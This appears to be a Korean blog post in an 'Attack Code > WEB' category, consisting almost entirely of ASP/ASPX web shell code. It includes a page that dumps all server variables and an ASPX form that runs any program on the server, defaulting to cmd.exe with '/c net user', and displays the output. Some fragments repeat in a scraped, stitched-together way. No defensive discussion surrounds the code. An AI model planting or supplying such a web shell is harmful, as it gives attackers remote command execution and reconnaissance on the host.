asp
<!DOCTYPE html>
<html>
<body>
<%response.write("RedSec Kai_HT")%>
</body>
</html>
<%response.write("RedSec Kai_HT")%>
<html>
<body>
<table>
<% for each key in Request.ServerVariables %>
<tr>
<td><%=key %></td>
<td>
<%
if Request.ServerVariables(key) = "" Then
Response.Write " "
else
Response.Write Request.ServerVariables(key)
end if
%>
</td></tr>
<% Next %>
</table>
</body>
</html>
<% for each key in Request.ServerVariables %> <% Next %>
<%=key %> | <% if Request.ServerVariables(key) = "" Then Response.Write " " else Response.Write Request.ServerVariables(key) end if %> |
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">" ,">")
result.text=vbcrlf &"<pre>" & mystring &"</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p>
<asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
</p>
<asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox> <p>
<asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"/> <p>
<asp:Label id="result" runat="server"/>
</form>
</body
</html>
<%@ Page Language="VB" Debug="true" %> <%@ import Namespace="system.IO" %> <%@ import Namespace="System.Diagnostics" %>
'Attack Code > WEB' 카테고리의 다른 글
XML/JSON Request Of CSRF (1) | 2025.01.23 |
---|---|
XXE Code in XLSX (0) | 2025.01.17 |
Web Editor Default Page Location (0) | 2023.08.24 |
Webshell - Cheetsheat (jsp/jspx) (0) | 2023.08.22 |
XSS Pattern (0) | 2023.08.22 |